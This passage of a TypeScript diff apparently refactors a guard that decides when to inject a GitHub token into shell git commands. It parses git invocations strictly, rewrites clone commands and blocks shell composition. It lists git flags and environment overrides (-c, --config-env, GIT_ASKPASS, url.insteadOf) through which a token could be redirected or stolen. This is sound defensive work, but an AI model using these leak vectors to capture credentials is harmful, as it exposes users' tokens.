-  const parsed = parseStrictCloneHead(head)
-  if (parsed === null) {
-    // A clone of a NON-github url needs no token, so the compound is harmless —
-    // pass through and let git run tokenless rather than block a legitimate
-    // e.g. gitlab clone-then-grep. Anything else (a github clone that failed the
-    // strict grammar — flags, odd dir, malformed url) falls through to the strict
-    // chain analysis, which blocks it.
-    return isNonGithubCloneHead(head) ? { kind: 'pass-through' } : null
+  for (let i = 0; i < args.length; i++) {
+    const arg = args[i] as string
+    if (arg === '-u' || arg === '--set-upstream') {
+      if (upstream) return null
+      upstream = true
+      continue
+    }
+    if (arg === '--repo' || arg === '--repository') {
+      const value = args[++i]
+      if (value === undefined || repository !== null || !isOptionValue(value)) return null
+      repository = value
+      continue
+    }
+    if (arg.startsWith('--repo=') || arg.startsWith('--repository=')) {
+      const value = arg.slice(arg.indexOf('=') + 1)
+      if (repository !== null || !isOptionValue(value)) return null
+      repository = value
+      continue
+    }
+    if (!isOptionValue(arg)) return null
+    positionals.push(arg)
   }
 
-  // Reconstruct the token-bearing head from the strict parse — an absolute git
-  // and separately single-quoted url + destination — so NO byte of the original
-  // untrusted head reaches the appended `&& exec` boundary. Absolute /usr/bin/git
-  // also removes alias/function/PATH ambiguity for the token-bearing command.
-  const canonicalHead = `/usr/bin/git clone ${posixSingleQuote(parsed.url)} ${posixSingleQuote(parsed.destination)}`
+  if (repository !== null) return { kind: 'single', value: repository, forPush: true }
+  if (positionals.length > 0) return { kind: 'single', value: positionals[0] as string, forPush: true }
+  return upstream ? null : { kind: 'default-push' }
+}
 
+function parseMintableFetch(args: readonly string[]): TargetSpec | null {
+  let multiple = false
+  const positionals: string[] = []
+  for (const arg of args) {
+    if (arg === '--multiple') {
+      if (multiple) return null
+      multiple = true
+    } else if (!isOptionValue(arg)) {
+      return null
+    } else {
+      positionals.push(arg)
+    }
+  }
+  if (positionals.length === 0) return null
+  return multiple
+    ? { kind: 'multiple', values: positionals }
+    : { kind: 'single', value: positionals[0] as string, forPush: false }
+}
+
+function parseSimpleRemote(args: readonly string[], forPush: boolean): TargetSpec | null {
+  if (args.length === 0 || args.some((arg) => !isOptionValue(arg))) return null
+  return { kind: 'single', value: args[0] as string, forPush }
+}
+
+function parseExplicitUrl(args: readonly string[], maxPositionals: number): TargetSpec | null {
+  if (args.length === 0 || args.length > maxPositionals || args.some((arg) => !isOptionValue(arg))) return null
+  const url = args[0] as string
+  return looksLikeUrl(url) ? { kind: 'single', value: url, forPush: false } : null
+}
+
+function tokenizeStandalone(command: string): string[] | null {
+  if (containsEscapeOrComment(command)) return null
+  const words: string[] = []
+  let current = ''
+  let quote: '"' | "'" | null = null
+  let hasContent = false
+
+  const flush = (): void => {
+    if (!hasContent) return
+    words.push(current)
+    current = ''
+    hasContent = false
+  }
+
+  for (const ch of command) {
+    if (quote === "'") {
+      if (ch === "'") quote = null
+      else current += ch
+      continue
+    }
+    if (quote === '"') {
+      if (ch === '$' || ch === '`') return null
+      if (ch === '"') quote = null
+      else current += ch
+      continue
+    }
+    if (ch === "'" || ch === '"') {
+      quote = ch
+      hasContent = true
+      continue
+    }
+    if (ch === ' ' || ch === '\t') {
+      flush()
+      continue
+    }
+    if (';&|\n\r(){}<>`$*?[]'.includes(ch)) return null
+    current += ch
+    hasContent = true
+  }
+  if (quote !== null) return null
+  flush()
+  return words
+}
+
+function isRemoteSubcommand(value: string | undefined): value is RemoteSubcommand {
+  return value === 'push' || value === 'fetch' || value === 'pull' || value === 'clone' || value === 'ls-remote'
+}
+
+function isLiteralDirectory(value: string): boolean {
+  return value !== '' && value !== '-' && value !== '~' && !value.startsWith('~/') && !value.startsWith('-')
+}
+
+function isOptionValue(value: string): boolean {
+  return value !== '' && !value.startsWith('-') && !value.startsWith('~')
+}
+
+async function resolveMintableEvidence(invocation: MintableInvocation, resolvers: GitResolvers): Promise<RepoEvidence> {
+  if (invocation.target.kind === 'multiple') {
+    return resolveFetchMultiple(invocation.target.values, invocation.cwd, resolvers)
+  }
+  if (invocation.target.kind === 'default-push') {
+    try {
+      const remote = await resolveDefaultPushRemote(invocation.cwd, resolvers)
+      return resolveOneTarget(remote, invocation.cwd, true, resolvers, false)
+    } catch {
+      return noEvidence(false)
+    }
+  }
+  return resolveOneTarget(invocation.target.value, invocation.cwd, invocation.target.forPush, resolvers, false)
+}
+
+async function resolveFetchMultiple(
+  targets: readonly string[],
+  cwd: string,
+  resolvers: GitResolvers,
+): Promise<RepoEvidence> {
+  const slugs: string[] = []
+  let complete = targets.length > 0
+
+  for (const target of targets) {
+    const evidence = await resolveOneTarget(target, cwd, false, resolvers, true)
+    slugs.push(...evidence.slugs)
+    complete &&= evidence.complete
+  }
+  return { slugs, complete }
+}
+
+async function resolveOneTarget(
+  target: string | null,
+  cwd: string,
+  forPush: boolean,
+  resolvers: GitResolvers,
+  nonGithubIsIncomplete: boolean,
+): Promise<RepoEvidence> {
+  if (target === null) return noEvidence(false)
+  let url: string | null
+  try {
+    url = looksLikeUrl(target) ? target : await resolvers.resolveRemoteUrl(cwd, target, forPush)
+  } catch {
+    return noEvidence(false)
+  }
+  if (url === null) return noEvidence(false)
+
+  const slug = parseGithubRepoFromGitUrl(url)
+  if (slug !== null) return { slugs: [slug], complete: true }
+  return { slugs: [], complete: !nonGithubIsIncomplete }
+}
+
+async function resolveDefaultPushRemote(cwd: string, resolvers: GitResolvers): Promise<string> {
+  const branch = await resolvers.resolveCurrentBranch(cwd)
+  if (branch !== null && branch !== '') {
+    const perBranch = await resolvers.resolveConfig(cwd, `branch.${branch}.pushRemote`)
+    if (perBranch !== null && perBranch !== '') return perBranch
+  }
+  const pushDefault = await resolvers.resolveConfig(cwd, 'remote.pushDefault')
+  return pushDefault === null || pushDefault === '' ? 'origin' : pushDefault
+}
+
+// Evidence discovery is intentionally not a shell parser. It recognizes only a
+// literal git at a few review-relevant boundaries, narrow redirection/wrapper
+// prefixes, and one immediately preceding literal `cd`. Misses run tokenless.
+async function discoverCompoundEvidence(command: string, cwd: string, resolvers: GitResolvers): Promise<RepoEvidence> {
+  const combined = noEvidence()
+  for (const segment of extractEvidenceGitSegments(command)) {
+    if (segment.cwd.kind === 'ambiguous') continue
+    const effectiveCwd = segment.cwd.kind === 'relative' ? resolveCwd(cwd, segment.cwd.dir) : cwd
+    const evidence = await discoverInvocationEvidence(segment.command, effectiveCwd, resolvers)
+    combined.slugs.push(...evidence.slugs)
+    combined.complete &&= evidence.complete
+  }
+  return combined
+}
+
+type EvidenceCwd = { kind: 'base' } | { kind: 'relative'; dir: string } | { kind: 'ambiguous' }
+type EvidenceGitSegment = { command: string; cwd: EvidenceCwd }
+
+function extractEvidenceGitSegments(command: string): EvidenceGitSegment[] {
+  const segments: EvidenceGitSegment[] = []
+  const assignment = '[A-Za-z_][A-Za-z0-9_]*=[^ \\t;&|(){}<>`\\r\\n]+'
+  const startRe = new RegExp(
+    `(?:^|&&|\\|\\||[;|&({\`\\n\\r])[ \\t]*` +
+      `(?:[0-9]*(?:>{1,2}|<)[ \\t]*[^ \\t;&|(){}<>\`\\r\\n]+[ \\t]+)*` +
+      `(?:(?:exec|command)[ \\t]+|env[ \\t]+(?:${assignment}[ \\t]+)*|(?:${assignment}[ \\t]+)+)?` +
+      'git(?=[ \\t]|$)',
+    'g',
+  )
+  for (const match of command.matchAll(startRe)) {
+    const matchText = match[0]
+    if (matchText === undefined || match.index === undefined) continue
+    const start = match.index + matchText.lastIndexOf('git')
+    let end = start + 3
+    while (end < command.length && !';|&(){}<>`#\n\r'.includes(command[end] as string)) end += 1
+    segments.push({
+      command: command.slice(start, end).trim(),
+      cwd: classifyEvidenceCwd(command.slice(0, match.index), matchText),
+    })
+  }
+  return segments
+}
+
+function classifyEvidenceCwd(prefix: string, matchText: string): EvidenceCwd {
+  const boundary = matchText.trimStart()
+  const direct = /(^|&&|\|\||[;|&({`\n\r])[ \t]*cd[ \t]+("[^"]*"|'[^']*'|[^\s'"]+)[ \t]*$/
+  const beforeGroup = /(^|&&|\|\||[;|&({`\n\r])[ \t]*cd[ \t]+("[^"]*"|'[^']*'|[^\s'"]+)[ \t]+&&[ \t]*$/
+  const match = boundary.startsWith('&&')
+    ? direct.exec(prefix)
+    : boundary.startsWith('(') || boundary.startsWith('{')
+      ? beforeGroup.exec(prefix)
+      : null
+  const containsPriorCd = /(?:^|&&|\|\||[;|&({`\n\r])[ \t]*cd(?:[ \t]|$)/
+  if (match === null) return containsPriorCd.test(prefix) ? { kind: 'ambiguous' } : { kind: 'base' }
+  if (containsPriorCd.test(prefix.slice(0, match.index))) return { kind: 'ambiguous' }
+
+  const dir = stripPairedQuotes(match[2] as string)
+  return isSafeCdDirectory(dir) ? { kind: 'relative', dir } : { kind: 'ambiguous' }
+}
+
+async function discoverInvocationEvidence(
+  segment: string,
+  baseCwd: string,
+  resolvers: GitResolvers,
+): Promise<RepoEvidence> {
+  const words = segment.split(/[ \t]+/).map(stripPairedQuotes)
+  if (words[0] !== 'git') return noEvidence()
+
+  let cursor = 1
+  let cwd = baseCwd
+  while (cursor < words.length) {
+    const arg = words[cursor] as string
+    if (arg === '-C') {
+      const dir = words[cursor + 1]
+      if (dir === undefined || !isLiteralDirectory(dir)) return noEvidence()
+      cwd = resolveCwd(cwd, dir)
+      cursor += 2
+      continue
+    }
+    if (arg === '-c' || EVIDENCE_GLOBAL_VALUE_OPTIONS.has(arg)) {
+      if (words[cursor + 1] === undefined) return noEvidence()
+      cursor += 2
+      continue
+    }
+    if (arg.startsWith('-c') && arg.length > 2) {
+      cursor += 1
+      continue
+    }
+    if (EVIDENCE_GLOBAL_INLINE_PREFIXES.some((prefix) => arg.startsWith(prefix))) {
+      cursor += 1
+      continue
+    }
+    break
+  }
+
+  const subcommand = words[cursor]
+  if (!isRemoteSubcommand(subcommand)) return noEvidence()
+  const target = parseEvidenceTarget(subcommand, words.slice(cursor + 1))
+  if (target === null) return noEvidence()
+  if (target.kind === 'multiple') return resolveFetchMultiple(target.values, cwd, resolvers)
+  if (target.kind === 'default-push') {
+    try {
+      return resolveOneTarget(await resolveDefaultPushRemote(cwd, resolvers), cwd, true, resolvers, false)
+    } catch {
+      return noEvidence(false)
+    }
+  }
+  return resolveOneTarget(target.value, cwd, target.forPush, resolvers, false)
+}
+
+function parseEvidenceTarget(subcommand: RemoteSubcommand, args: readonly string[]): TargetSpec | null {
+  if (subcommand === 'push') {
+    let repository: string | null = null
+    const positionals: string[] = []
+    for (let i = 0; i < args.length; i++) {
+      const arg = args[i] as string
+      if (arg === '-u' || arg === '--set-upstream') continue
+      if (arg === '--repo' || arg === '--repository') {
+        const value = args[++i]
+        if (value === undefined || repository !== null || !isOptionValue(value)) return null
+        repository = value
+        continue
+      }
+      if (arg.startsWith('--repo=') || arg.startsWith('--repository=')) {
+        const value = arg.slice(arg.indexOf('=') + 1)
+        if (repository !== null || !isOptionValue(value)) return null
+        repository = value
+        continue
+      }
+      if (!isOptionValue(arg)) return null
+      positionals.push(arg)
+    }
+    if (repository !== null) return { kind: 'single', value: repository, forPush: true }
+    return positionals.length === 0
+      ? { kind: 'default-push' }
+      : { kind: 'single', value: positionals[0] as string, forPush: true }
+  }
+
+  if (subcommand === 'fetch') {
+    let multiple = false
+    const positionals: string[] = []
+    for (const arg of args) {
+      if (arg === '--multiple') multiple = true
+      else if (!isOptionValue(arg)) return null
+      else positionals.push(arg)
+    }
+    if (positionals.length === 0) return null
+    return multiple
+      ? { kind: 'multiple', values: positionals }
+      : { kind: 'single', value: positionals[0] as string, forPush: false }
+  }
+
+  if (subcommand === 'pull' || subcommand === 'ls-remote') {
+    if (args.length === 0 || args.some((arg) => !isOptionValue(arg))) return null
+    return { kind: 'single', value: args[0] as string, forPush: false }
+  }
+
+  const positionals: string[] = []
+  for (let i = 0; i < args.length; i++) {
+    const arg = args[i] as string
+    if (
+      arg === '--depth' ||
+      arg === '--branch' ||
+      arg === '-b' ||
+      arg === '--origin' ||
+      arg === '-o' ||
+      arg === '--config'
+    ) {
+      if (args[++i] === undefined) return null
+      continue
+    }
+    if (arg.startsWith('--config=')) continue
+    if (arg.startsWith('-')) return null
+    positionals.push(arg)
+  }
+  if (positionals.length === 0 || !looksLikeUrl(positionals[0] as string)) return null
+  return { kind: 'single', value: positionals[0] as string, forPush: false }
+}
+
+function hasShellComposition(command: string): boolean {
+  if (containsEscapeOrComment(command)) return true
+  let quote: '"' | "'" | null = null
+  for (const ch of command) {
+    if (quote === "'") {
+      if (ch === "'") quote = null
+      continue
+    }
+    if (quote === '"') {
+      if (ch === '$' || ch === '`') return true
+      if (ch === '"') quote = null
+      continue
+    }
+    if (ch === "'" || ch === '"') {
+      quote = ch
+      continue
+    }
+    if (';&|\n\r(){}<>`$*?[]'.includes(ch)) return true
+  }
+  return quote !== null
+}
+
+function containsEscapeOrComment(command: string): boolean {
+  return command.includes('\\') || command.includes('#')
+}
+
+type SafeCd = { kind: 'none' } | { kind: 'unsafe' } | { kind: 'safe'; cwd: string; rest: string }
+
+function parseSafeCdPrefix(command: string, baseCwd: string): SafeCd {
+  const match = command.match(/^\s*cd\s+("[^"]*"|'[^']*'|[^\s'"]+)\s+&&\s*(\S[\s\S]*?)\s*$/)
+  if (match === null) return { kind: 'none' }
+  const dir = stripPairedQuotes(match[1] as string)
+  if (!isSafeCdDirectory(dir)) return { kind: 'unsafe' }
+  return { kind: 'safe', cwd: resolveCwd(baseCwd, dir), rest: match[2] as string }
+}
+
+function isSafeCdDirectory(dir: string): boolean {
+  return isLiteralDirectory(dir) && !dir.includes("'") && !/[;|&<>(){}$`\\#]/.test(dir)
+}
+
+function resolveCwd(base: string, dir: string): string {
+  if (dir.startsWith('/')) return dir
+  return `${base.replace(/\/$/, '')}/${dir}`
+}
+
+function stripPairedQuotes(value: string): string {
+  if (value.length < 2) return value
+  const first = value[0]
+  const last = value[value.length - 1]
+  return first === last && (first === '"' || first === "'") ? value.slice(1, -1) : value
+}
+
+// The token-bearing clone head is deliberately much smaller than Git's grammar.
+// The tail is opaque and runs only in a new token-stripped shell.
+function analyzeCloneThenInspect(command: string): GitCommandDecision | null {
+  const split = splitCloneHeadAndTail(command)
+  if (split === null) return null
+  if (split.tail === '') return { kind: 'block', reason: COMPOSITION_REASON }
+  if (tailContainsGitInvocation(split.tail)) return null
+
+  const parsed = parseStrictCloneHead(split.head)
+  if (parsed === null) return isNonGithubCloneHead(split.head) ? { kind: 'pass-through' } : null
+
+  const canonicalHead = `/usr/bin/git clone ${posixSingleQuote(parsed.url)} ${posixSingleQuote(parsed.destination)}`
   return {
     kind: 'inject',
     repoSlug: parsed.repoSlug,
-    rewrittenCommand: `${canonicalHead} && ${TAIL_STRIP_PREFIX} ${posixSingleQuote(tail)}`,
+    rewrittenCommand: `${canonicalHead} && ${TAIL_STRIP_PREFIX} ${posixSingleQuote(split.tail)}`,
   }
+}
+
+function tailContainsGitInvocation(tail: string): boolean {
+  return extractEvidenceGitSegments(tail).length > 0
 }
 
 type StrictCloneHead = { repoSlug: string; url: string; destination: string }
 
-// A DELIBERATELY tiny grammar for the token-bearing clone head:
-// `git clone <https-github-url> <simple-destination>` — no flags (clone's own
-// `-c`/`--config` reopens credential-helper/url-redirection analysis), no leading
-// env assignment, no quoting, no metachars. The captured owner/repo and url come
-// straight from this match, never the generic escape-blind tokenizer, so the
-// reconstructed command cannot be perturbed by anything in the raw head. Anything
-// outside the grammar returns null → the caller falls through (blocks or passes).
 const STRICT_CLONE_HEAD_RE =
   /^[ \t]*git[ \t]+clone[ \t]+(https:\/\/github\.com\/([A-Za-z0-9_.-]+\/[A-Za-z0-9_.-]+?)(?:\.git)?)[ \t]+([A-Za-z0-9._/-]+)[ \t]*$/
 
 function parseStrictCloneHead(head: string): StrictCloneHead | null {
-  const m = STRICT_CLONE_HEAD_RE.exec(head)
-  if (m === null) return null
-  const url = m[1] as string
-  const repoSlug = m[2] as string
-  const destination = m[3] as string
-  if (destination.startsWith('-')) return null
-  if (repoSlug.endsWith('/') || repoSlug.startsWith('/')) return null
+  const match = STRICT_CLONE_HEAD_RE.exec(head)
+  if (match === null) return null
+  const url = match[1] as string
+  const repoSlug = match[2] as string
+  const destination = match[3] as string
+  if (destination.startsWith('-') || repoSlug.startsWith('/') || repoSlug.endsWith('/')) return null
   return { repoSlug, url, destination }
 }
 
-// True when the head is `git clone … <url> …` for a url whose host is clearly not
-// github.com — a clone that needs no minted token, so its compound form is safe to
-// run tokenless. Conservative: only a positive non-github host match returns true;
-// anything ambiguous returns false so the caller falls through (and blocks).
 function isNonGithubCloneHead(head: string): boolean {
   if (!/^[ \t]*git[ \t]+clone[ \t]/.test(head)) return false
   const url = /(?:^|[ \t])((?:https?:\/\/|git@|ssh:\/\/)[^ \t]+)/.exec(head)?.[1]
-  if (url === undefined) return false
-  return parseGithubRepoFromGitUrl(url) === null
+  return url !== undefined && parseGithubRepoFromGitUrl(url) === null
 }
 
-// Splits on the FIRST top-level `&&`, quote-aware. Rejects (null) when any other
-// top-level operator (`;`, `|`, `||`, single `&`, newline) precedes it — those
-// don't guarantee the clone finished before the tail, so the token could still be
-// live in a concurrent sibling. head keeps the raw text up to the `&&`; tail is
-// everything after, treated as opaque.
 function splitCloneHeadAndTail(command: string): { head: string; tail: string } | null {
   let quote: '"' | "'" | null = null
   for (let i = 0; i < command.length; i++) {
@@ -358,127 +651,21 @@ function splitCloneHeadAndTail(command: string): { head: string; tail: string } 
   return null
 }
 
-// Wraps a string in single quotes with POSIX-safe escaping: each embedded single
-// quote becomes '\'' (close-quote, escaped literal quote, reopen). The result is
-// inert — no shell metacharacter inside can act — so the tail cannot break out of
-// the `bash -c` argument.
 function posixSingleQuote(value: string): string {
   return `'${value.replaceAll("'", "'\\''")}'`
 }
 
-// Global flags that can redirect git's auth or destination. `-c`/`--config-env`
-// inject arbitrary config (url.insteadOf, core.askPass, credential.*, http.*);
-// `--git-dir`/`--work-tree`/`--namespace`/`--exec-path` point git at a different
-// repo or helper than the one we resolved. Any of these on a token-bearing
-// command means we cannot vouch for where the token goes — block.
-function hasDangerousGitConfig(args: readonly string[]): boolean {
-  for (const arg of args) {
-    // git accepts both `--config-env <name>=<envvar>` and the inline
-    // `--config-env=<name>=<envvar>`; both must be caught. (`-c` has no inline
-    // `-c=…` form — git always takes the next token.)
-    if (arg === '-c' || arg === '--config-env' || arg.startsWith('--config-env=')) return true
-    if (arg === '--git-dir' || arg.startsWith('--git-dir=')) return true
-    if (arg === '--work-tree' || arg.startsWith('--work-tree=')) return true
-    if (arg === '--namespace' || arg.startsWith('--namespace=')) return true
-    if (arg === '--exec-path' || arg.startsWith('--exec-path=')) return true
-  }
-  return false
-}
-
-async function resolveRepoSlugs(
-  subcommand: string,
-  args: readonly string[],
-  cwd: string,
-  resolvers: GitResolvers,
-): Promise<string[]> {
-  // `fetch --multiple` contacts EVERY positional target — remotes AND raw URLs,
-  // mixed, and a target may even be a `remotes.<group>` that expands to several.
-  // Enumerate them all (not just the first URL) so the distinct-repo guard sees
-  // the full set. FAIL CLOSED: if ANY target can't be resolved to a github slug
-  // (an unknown remote, a config remote-group we can't expand, a non-github URL),
-  // throw so the caller passes through tokenless — never mint for a subset while
-  // git contacts the rest. Non-`--multiple` keeps the single-target path.
-  const forPush = subcommand === 'push'
-  if (subcommand === 'fetch' && args.includes('--multiple')) {
-    const slugs: string[] = []
-    for (const pos of positionalsAfterSubcommand('fetch', args)) {
-      const url = looksLikeUrl(pos) ? pos : await resolvers.resolveRemoteUrl(cwd, pos, forPush)
-      const slug = url === null ? null : parseGithubRepoFromGitUrl(url)
-      if (slug === null) throw new Error('unresolved --multiple target')
-      slugs.push(slug)
-    }
-    return slugs
-  }
-
-  const explicitUrl = extractExplicitUrl(subcommand, args)
-  if (explicitUrl !== null) {
-    const slug = parseGithubRepoFromGitUrl(explicitUrl)
-    return slug === null ? [] : [slug]
-  }
-
-  // clone needs an explicit URL; it has no configured-remote fallback.
-  if (subcommand === 'clone') return []
-
-  const remoteNames = extractRemoteNames(args)
-  // The branch.pushRemote/pushDefault/origin chain is a PUSH default; applying it
-  // to a bare `fetch`/`pull`/`ls-remote` could mint for the wrong (push) remote,
-  // so only push falls back. Other subcommands with no explicit remote pass through.
-  const remotes =
-    remoteNames.length > 0 ? remoteNames : subcommand === 'push' ? [await resolveDefaultPushRemote(cwd, resolvers)] : []
-  if (remotes.length === 0) return []
-
-  const slugs: string[] = []
-  for (const remote of remotes) {
-    if (remote === null) continue
-    const url = looksLikeUrl(remote) ? remote : await resolvers.resolveRemoteUrl(cwd, remote, forPush)
-    if (url === null) continue
-    const slug = parseGithubRepoFromGitUrl(url)
-    if (slug !== null) slugs.push(slug)
-  }
-  return slugs
-}
-
-// Mirrors git's own push-remote resolution order for a bare `git push`.
-async function resolveDefaultPushRemote(cwd: string, resolvers: GitResolvers): Promise<string | null> {
-  const branch = await resolvers.resolveCurrentBranch(cwd)
-  if (branch !== null && branch !== '') {
-    const perBranch = await resolvers.resolveConfig(cwd, `branch.${branch}.pushRemote`)
-    if (perBranch !== null && perBranch !== '') return perBranch
-  }
-  const pushDefault = await resolvers.resolveConfig(cwd, 'remote.pushDefault')
-  if (pushDefault !== null && pushDefault !== '') return pushDefault
-  return 'origin'
-}
-
-// The `gh`-side cwd default repo: the working tree's `origin` FETCH url only.
-// Unlike `git push`, `gh <cmd>` with no `-R` has no push semantics, so we do NOT
-// consult the branch.pushRemote/remote.pushDefault chain — origin is what `gh`
-// itself would infer. Returns a literal `owner/repo` slug or null; the caller
-// still gates it through the repos[] allowlist before minting.
-export async function resolveGhDefaultRepoFromCwd(cwd: string, resolvers: GitResolvers): Promise<string | null> {
-  const url = await resolvers.resolveRemoteUrl(cwd, 'origin', false)
-  if (url === null) return null
-  return parseGithubRepoFromGitUrl(url)
-}
-
 const HTTPS_GITHUB_RE = /^https:\/\/github\.com\/([^/\s:@]+)\/([^/\s?#]+?)(?:\.git)?\/?(?:[?#].*)?$/i
 const SCP_GITHUB_RE = /^git@github\.com:([^/\s:?#]+)\/([^/\s?#]+?)(?:\.git)?$/i
-// No explicit port: the forced insteadOf only rewrites `ssh://git@github.com/`, so
-// a ported form (`ssh://git@github.com:22/…`) would keep ssh transport and bypass
-// the https askpass. We therefore do NOT recognize the ported spelling as github —
-// it resolves to no slug, so no token is minted and git fails honestly.
 const SSH_GITHUB_RE = /^ssh:\/\/git@github\.com\/([^/\s]+)\/([^/\s?#]+?)(?:\.git)?\/?(?:[?#].*)?$/i
 
-// Parses a github.com remote URL into an `owner/name` slug. Returns null for
-// non-github.com hosts, credential-bearing https URLs (https://tok@github.com/…
-// — we never reuse an embedded credential), local paths, or malformed input.
 export function parseGithubRepoFromGitUrl(raw: string): string | null {
   const url = raw.trim()
   for (const re of [HTTPS_GITHUB_RE, SCP_GITHUB_RE, SSH_GITHUB_RE]) {
-    const m = url.match(re)
-    if (m === null) continue
-    const owner = m[1]
-    const name = m[2]
+    const match = url.match(re)
+    if (match === null) continue
+    const owner = match[1]
+    const name = match[2]
     if (owner === undefined || name === undefined || owner === '' || name === '') return null
     return `${owner}/${name}`
   }
@@ -486,352 +673,10 @@ export function parseGithubRepoFromGitUrl(raw: string): string | null {
 }
 
 function looksLikeUrl(token: string): boolean {
-  if (/^[a-z][a-z0-9+.-]*:\/\//i.test(token)) return true
-  if (/^[^@\s]+@[^:\s]+:/.test(token)) return true
-  return false
+  return /^[a-z][a-z0-9+.-]*:\/\//i.test(token) || /^[^@\s]+@[^:\s]+:/.test(token)
 }
 
-// Flags that consume the FOLLOWING token, so a positional after them (the
-// subcommand or a remote/URL) is not mistaken for the flag's value. Includes the
-// dangerous-config flags in their separate-arg form (`--config-env <v>`) so the
-// real subcommand is still located and hasDangerousGitConfig can fire.
-const GIT_VALUE_FLAGS = new Set([
-  '-C',
-  '-c',
-  '--config-env',
-  '--git-dir',
-  '--work-tree',
-  '--namespace',
-  '--exec-path',
-  '-o',
-  '--origin',
-  '-b',
-  '--branch',
-  '-u',
-])
-
-function extractExplicitUrl(subcommand: string, args: readonly string[]): string | null {
-  // `git push --repo <url>` / `--repo=<url>`
-  for (let i = 0; i < args.length; i++) {
-    const arg = args[i] as string
-    if (arg === '--repo' || arg === '--repository') {
-      const v = args[i + 1]
-      if (v !== undefined && looksLikeUrl(v)) return v
-    }
-    if (arg.startsWith('--repo=')) return arg.slice('--repo='.length)
-    if (arg.startsWith('--repository=')) return arg.slice('--repository='.length)
-  }
-  // First positional after the subcommand that looks like a URL.
-  for (const pos of positionalsAfterSubcommand(subcommand, args)) {
-    if (looksLikeUrl(pos)) return pos
-  }
-  return null
-}
-
-// The git subcommand is the first positional that is NOT consumed by a global
-// value-flag (`git -C <dir> push`, `git -c k=v push`). A naive first-non-flag
-// scan would pick the flag's value (e.g. `<dir>`) as the subcommand.
-function findSubcommand(args: readonly string[]): string | undefined {
-  for (let i = 0; i < args.length; i++) {
-    const arg = args[i] as string
-    if (arg.startsWith('-')) {
-      if (!arg.includes('=') && GIT_VALUE_FLAGS.has(arg)) i += 1
-      continue
-    }
-    return arg
-  }
-  return undefined
-}
-
-// The remote name(s) a command targets. Normally just the first positional —
-// later positionals are refspecs (`git push origin main` -> remote `origin`,
-// refspec `main`). With `--multiple` (fetch), EVERY positional is a remote, so
-// all are returned to feed the multi-owner guard. URL positionals are excluded
-// here; resolveRepoSlugs handles a bare-URL target directly.
-function extractRemoteNames(args: readonly string[]): string[] {
-  const sub = findSubcommand(args)
-  if (sub === undefined) return []
-  const positionals = positionalsAfterSubcommand(sub, args).filter((p) => !looksLikeUrl(p))
-  if (positionals.length === 0) return []
-  if (args.includes('--multiple')) return positionals
-  return [positionals[0] as string]
-}
-
-function positionalsAfterSubcommand(subcommand: string, args: readonly string[]): string[] {
-  const out: string[] = []
-  let seenSub = false
-  for (let i = 0; i < args.length; i++) {
-    const arg = args[i] as string
-    if (arg.startsWith('-')) {
-      if (!arg.includes('=') && GIT_VALUE_FLAGS.has(arg)) i += 1
-      continue
-    }
-    if (!seenSub) {
-      if (arg === subcommand) seenSub = true
-      continue
-    }
-    out.push(arg)
-  }
-  return out
-}
-
-// git applies repeated `-C` CUMULATIVELY: each value is resolved relative to the
-// result of the previous one, and an absolute value resets the base. So `-C
-// /trusted -C child` operates in `/trusted/child`, not `child`. We fold them the
-// same way from `base` so we resolve the repo of the checkout git actually uses —
-// resolving only the last `-C` from cwd would mint against a different tree.
-function resolveEffectiveCwd(base: string, args: readonly string[]): string {
-  let cwd = base
-  for (let i = 0; i < args.length; i++) {
-    if (args[i] === '-C') {
-      const v = args[i + 1]
-      if (v !== undefined) cwd = resolveCwd(cwd, stripQuotes(v))
-    }
-  }
-  return cwd
-}
-
-type GitInvocation = { args: string[]; hasLeadingEnvAssignment: boolean }
-
-// Null unless there is exactly one `git` at command position. Composition is NOT
-// rejected here — it is screened later against the original command so the block
-// reason stays accurate. hasLeadingEnvAssignment flags `FOO=bar git …`: such an
-// assignment lands in git's env (where a `GIT_ASKPASS=…` override would receive
-// the token), so the caller blocks it for token-bearing commands.
-function extractSingleGitInvocation(command: string): GitInvocation | null {
-  const tokens = tokenize(command)
-  const gitStarts: number[] = []
-  for (let i = 0; i < tokens.length; i++) {
-    if (tokens[i] !== 'git') continue
-    if (i === 0 || isCommandBoundaryBefore(tokens, i)) gitStarts.push(i)
-  }
-  if (gitStarts.length !== 1) return null
-  const start = gitStarts[0] as number
-  const hasLeadingEnvAssignment = start > 0 && /^[A-Za-z_][A-Za-z0-9_]*=/.test(tokens[start - 1] ?? '')
-  const args = tokens.slice(start + 1).filter((t) => t !== '\n' && t !== ';' && t !== '|' && t !== '&')
-  return { args, hasLeadingEnvAssignment }
-}
-
-// True if `git` appears at any command boundary. Used to decide block-vs-pass:
-// a command with no git at all is none of our business (pass-through), but one
-// that DOES contain git yet is not a clean git-only `&&` chain must be blocked,
-// not run tokenless.
-function containsGitInvocation(command: string): boolean {
-  const tokens = tokenize(command)
-  for (let i = 0; i < tokens.length; i++) {
-    if (tokens[i] === 'git' && (i === 0 || isCommandBoundaryBefore(tokens, i))) return true
-  }
-  return false
-}
-
-// Splits a command into `&&`-joined segments and accepts it ONLY when EVERY
-// segment is a single bare `git` invocation. Returns null (caller blocks or
-// passes through) when any segment is non-git, the chain uses any operator other
-// than `&&` (`;`, `|`, `||`, `&`, newline) at top level, or a segment carries a
-// shell-active metachar (`$`, backtick, redirection, subshell) that could spawn
-// or feed a NON-git process — which would inherit the shared token env. The
-// all-git invariant is load-bearing: the token rides in a plain inherited env
-// var, so a single non-git sibling could read it directly.
-function extractGitInvocationChain(command: string): GitInvocation[] | null {
-  // Quote-aware screen on the ORIGINAL command: every shell-active metachar
-  // except the `&&` chain operator must be absent. This rejects `;`, `|`, `||`,
-  // single `&`, redirection, subshells, and `$`/backtick (active outside single
-  // quotes) — anything that could spawn or feed a non-git process that would
-  // inherit the shared token env. Screening the original (not dequoted tokens)
-  // keeps a safely single-quoted `$` from being a false positive.
-  if (containsUnsafeMetacharOutsideAndAnd(command)) return null
-
-  const tokens = tokenize(command)
-  if (tokens.length === 0) return null
-
-  const segments: string[][] = [[]]
-  for (const token of tokens) {
-    if (token === '&&') {
-      segments.push([])
-      continue
-    }
-    // The metachar screen above already rejected every other operator; this is
-    // belt-and-suspenders in case the tokenizer ever emits one we missed.
-    if (token === ';' || token === '|' || token === '||' || token === '&' || token === '\n') return null
-    ;(segments[segments.length - 1] as string[]).push(token)
-  }
-
-  const invocations: GitInvocation[] = []
-  for (const seg of segments) {
-    if (seg.length === 0) return null
-    let start = 0
-    while (start < seg.length && /^[A-Za-z_][A-Za-z0-9_]*=/.test(seg[start] ?? '')) start += 1
-    const hasLeadingEnvAssignment = start > 0
